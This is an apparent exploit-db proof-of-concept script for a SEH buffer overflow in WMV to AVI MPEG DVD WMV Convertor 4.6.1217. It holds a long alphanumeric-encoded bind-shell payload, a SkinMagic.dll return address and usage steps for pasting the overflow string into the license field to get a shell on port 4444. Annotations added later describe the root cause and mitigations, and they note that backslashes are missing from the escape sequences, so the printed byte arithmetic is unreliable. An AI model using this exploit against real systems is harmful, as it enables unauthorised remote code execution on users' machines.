


WMV to AVI MPEG DVD WMV Convertor 4.6.1217 – Buffer OverFlow (SEH)



# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
# Google Dork: N/A
# Date: 2019-10-30
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage: https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Version: v4.6.1217
# Tested on: Windows XP SP3
# CVE : N/A
# Reference from : [1] https://www.exploit-db.com/exploits/47563        

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will get a bind shell on port 4444

#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b 'x00' -f hex
# The pasted payload must consist only of characters the application's license field accepts (allowed characters: x21->x7E in the ASCII table)
shellcode = (
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx53x2Ax52x25x2Dx53x2Ax52x25x2Dx55x2Ax52x25x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x34x4Dx68x2Dx23x34x4Dx68x2Dx24x36x4Dx69x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x5Cx30x75x2Dx62x5Cx30x75x2Dx62x5Ex31x75x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx60x73x71x3Bx2Dx60x73x71x3Bx2Dx61x75x73x3Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Bx39x6Fx40x2Dx4Bx39x6Fx40x2Dx4Cx39x70x40x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x47x44x27x2Dx62x47x44x27x2Dx63x47x45x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx38x49x2Ax35x2Dx38x49x2Ax35x2Dx38x49x2Ax36x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Dx71x68x26x2Dx5Dx71x68x26x2Dx5Dx71x6Ax28x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx47x21x25x28x2Dx47x21x25x28x2Dx49x22x27x29x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx44x56x34x3Cx2Dx44x56x34x3Cx2Dx45x58x35x3Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx57x31x33x44x2Dx57x31x33x44x2Dx58x32x34x45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx6Ex4Fx50x2Dx3Cx6Ex4Fx50x2Dx3Ex70x50x52x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx38x33x5Fx2Dx3Fx38x33x5Fx2Dx40x39x33x60x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx4Dx38x22x2Dx6Fx4Dx38x22x2Dx6Fx4Fx3Ax24x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x72x56x55x2Dx62x72x56x55x2Dx63x74x58x55x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Bx66x52x53x2Dx4Bx66x52x53x2Dx4Cx67x52x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Bx22x35x71x2Dx3Bx22x35x71x2Dx3Cx22x37x72x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Ex4Fx64x55x2Dx2Ex4Fx64x55x2Dx2Ex51x65x55x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx59x48x59x5Ax2Dx59x48x59x5Ax2Dx5Bx4Ax59x5Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x62x5Cx5Ax2Dx49x62x5Cx5Ax2Dx4Ax64x5Cx5Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx63x54x2Ax47x2Dx63x54x2Ax47x2Dx65x55x2Ax47x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx48x4Dx4Dx43x2Dx48x4Dx4Dx43x2Dx49x4Fx4Ex45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx30x75x60x3Ax2Dx30x75x60x3Ax2Dx32x75x60x3Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx60x6Bx3Fx52x2Dx60x6Bx3Fx52x2Dx60x6Dx40x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx47x21x58x2Dx3Fx47x21x58x2Dx3Fx49x22x58x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx65x4Ex25x4Ax2Dx65x4Ex25x4Ax2Dx65x4Ex27x4Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Ex35x60x46x2Dx3Ex35x60x46x2Dx3Ex37x60x46x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx45x2Ex2Dx41x2Dx45x2Ex2Dx41x2Dx45x30x2Ex42x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Cx4Bx74x4Cx2Dx6Cx4Bx74x4Cx2Dx6Ex4Cx74x4Cx50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx42x43x29x26x2Dx42x43x29x26x2Dx43x43x2Ax27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Fx61x43x34x2Dx2Fx61x43x34x2Dx31x61x45x34x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx50x58x4Bx69x2Dx50x58x4Bx69x2Dx52x59x4Dx6Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx71x29x29x39x2Dx71x29x29x39x2Dx73x2Bx2Ax39x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx54x68x52x6Dx2Dx54x68x52x6Dx2Dx55x68x52x6Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx20x3Cx5Bx64x2Dx20x3Cx5Bx64x2Dx21x3Ex5Bx66x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx58x6Ex65x6Bx2Dx58x6Ex65x6Bx2Dx5Ax6Fx67x6Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx69x26x52x23x2Dx69x26x52x23x2Dx69x27x54x25x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx46x3Fx27x71x2Dx46x3Fx27x71x2Dx48x40x29x72x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx24x52x54x2Dx3Cx24x52x54x2Dx3Ex26x54x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Cx40x4Fx55x2Dx5Cx40x4Fx55x2Dx5Dx40x51x57x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Ax5Cx33x58x2Dx6Ax5Cx33x58x2Dx6Ax5Cx34x59x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Fx3Ex5Ax5Dx2Dx5Fx3Ex5Ax5Dx2Dx5Fx40x5Cx5Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x4Dx6Ax3Bx2Dx49x4Dx6Ax3Bx2Dx4Ax4Fx6Cx3Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x23x6Bx3Dx2Dx62x23x6Bx3Dx2Dx63x23x6Bx3Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x6Ax57x67x2Dx23x6Ax57x67x2Dx24x6Cx57x67x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x43x60x50x2Dx23x43x60x50x2Dx25x43x60x50x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx73x31x34x2Ax2Dx73x31x34x2Ax2Dx73x33x34x2Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx38x56x63x59x2Dx38x56x63x59x2Dx39x56x65x59x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx40x52x60x66x2Dx40x52x60x66x2Dx41x53x61x67x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx24x61x73x2Ax2Dx24x61x73x2Ax2Dx26x61x75x2Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx48x34x53x66x2Dx48x34x53x66x2Dx48x34x54x68x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx26x57x26x2Dx3Cx26x57x26x2Dx3Cx27x58x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx54x63x3Ax27x2Dx54x63x3Ax27x2Dx54x63x3Ax27x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx26x26x2Fx50x2Dx26x26x2Fx50x2Dx27x27x2Fx51x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx30x52x2Ex62x2Dx30x52x2Ex62x2Dx30x54x30x63x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx31x5Ax75x73x2Dx31x5Ax75x73x2Dx32x5Bx75x75x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx36x41x66x56x2Dx36x41x66x56x2Dx36x42x68x57x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx36x63x50x32x2Dx36x63x50x32x2Dx36x63x51x33x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx59x4Bx23x26x2Dx59x4Bx23x26x2Dx5Ax4Cx24x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx28x68x4Ax4Dx2Dx28x68x4Ax4Dx2Dx2Ax69x4Bx4Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Ex41x53x6Ax2Dx2Ex41x53x6Ax2Dx30x42x55x6Ax50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx6Ax2Fx6Dx2Dx6Fx6Ax2Fx6Dx2Dx6Fx6Ax2Fx6Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Cx44x30x30x2Dx2Cx44x30x30x2Dx2Dx46x30x31x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ax67x69x4Fx2Dx4Ax67x69x4Fx2Dx4Ax69x69x51x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx65x44x45x68x2Dx65x44x45x68x2Dx66x44x45x6Ax50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx57x32x45x2Dx6Fx57x32x45x2Dx6Fx59x34x47x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx35x2Cx45x43x2Dx35x2Cx45x43x2Dx37x2Cx46x45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx69x4Ax5Ax6Dx2Dx69x4Ax5Ax6Dx2Dx6Ax4Ax5Cx6Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Fx54x6Bx5Ex2Dx2Fx54x6Bx5Ex2Dx2Fx56x6Bx60x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx40x25x6Ex55x2Dx40x25x6Ex55x2Dx41x26x6Ex57x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx52x6Fx33x2Dx2Dx52x6Fx33x2Dx2Dx52x70x33x2Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Ax6Ex6Dx3Dx2Dx3Ax6Ex6Dx3Dx2Dx3Bx6Ex6Ex3Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ex3Dx41x4Fx2Dx4Ex3Dx41x4Fx2Dx4Fx3Dx42x4Fx50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x28x48x64x2Dx49x28x48x64x2Dx4Ax28x49x64x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx73x2Ex5Ax59x2Dx73x2Ex5Ax59x2Dx74x2Ex5Ax59x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ex68x29x3Ax2Dx4Ex68x29x3Ax2Dx4Fx68x2Bx3Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx21x32x38x36x2Dx21x32x38x36x2Dx22x32x38x36x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx53x4Cx2Bx47x2Dx53x4Cx2Bx47x2Dx54x4Cx2Bx47x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Cx2Fx47x6Bx2Dx5Cx2Fx47x6Bx2Dx5Ex31x47x6Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Dx35x37x5Cx2Dx6Dx35x37x5Cx2Dx6Dx35x39x5Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx28x35x41x22x2Dx28x35x41x22x2Dx28x36x43x22x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Dx40x6Fx2Bx2Dx2Dx40x6Fx2Bx2Dx2Fx41x6Fx2Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx20x42x3Cx2Bx2Dx20x42x3Cx2Bx2Dx21x43x3Ex2Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx4Ex54x2Bx2Dx3Fx4Ex54x2Bx2Dx3Fx50x54x2Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx29x69x53x44x2Dx29x69x53x44x2Dx2Bx6Ax54x46x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x6Bx6Fx39x2Dx62x6Bx6Fx39x2Dx62x6Cx6Fx39x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx67x6Cx40x26x2Dx67x6Cx40x26x2Dx69x6Ex41x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x59x36x44x2Dx49x59x36x44x2Dx4Ax59x37x46x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx61x68x61x2Ex2Dx61x68x61x2Ex2Dx61x68x63x2Ex50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx70x6fx6fx6fx50x50x50" # push 12 NOP 
)

# Fixed components of the overflow string. The addresses in the trailing
# comments are the author's, from the Windows XP SP3 setup named in the header.
alignment = "x54x58x2dx54x54x54x54x2dx37x63x54x54x2dx25x31x57x57x50x5C" # stack alignment 001292C0 - 0012AA10
jump_short = "x90x90xEBx08"  # jump to 00129A44
pop_pop_ret ="x09x9ax01x10" # pop pop ret in SkinMagic.dll
# Layout: 780 bytes of filler, then the jump/handler pair (presumably the
# overwritten SEH record the title refers to), four more filler bytes, the
# alignment stub and the encoded shellcode, padded with "x45" to the 6000
# total the arithmetic targets.
# Defender notes:
# - Root cause is a fixed-size stack buffer receiving the license-field text
#   without a length check; bounding that copy (or rejecting input longer
#   than any legitimate license key) removes the overflow. Building with
#   /GS, /SAFESEH, /DYNAMICBASE and /NXCOMPAT would each blunt this chain.
# - The handler address is taken from SkinMagic.dll; the author relies on that
#   module being usable for an SEH overwrite, which suggests it lacks SafeSEH —
#   TODO confirm against the shipped DLL.
# - Detection: a license-name/code field of several thousand characters is far
#   outside any real key length and is a cheap input-validation trip wire.
# NOTE(review): the escape sequences in these literals (and in `shellcode`
# above) appear to have lost their backslashes in transcription; as printed,
# "x41" is three ASCII characters, so the length arithmetic below does not
# produce the byte counts the comments describe.
buffer = "x41" * 780 + jump_short + pop_pop_ret + "x41x41x41x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "x45"

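# Write the assembled string to disk for manual pasting into the application.
# The usage steps above refer to EVIL.txt; this script actually writes
# shell.txt.
# A context manager guarantees the handle is closed even if write() raises,
# and only I/O errors are caught: the original bare `except:` also hid
# NameError (e.g. an undefined `buffer`) and KeyboardInterrupt behind the
# generic "File cannot be created" message.
try:
    with open("shell.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError):
    print("File cannot be created")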
            





https://www.exploit-db.com/exploits/47568



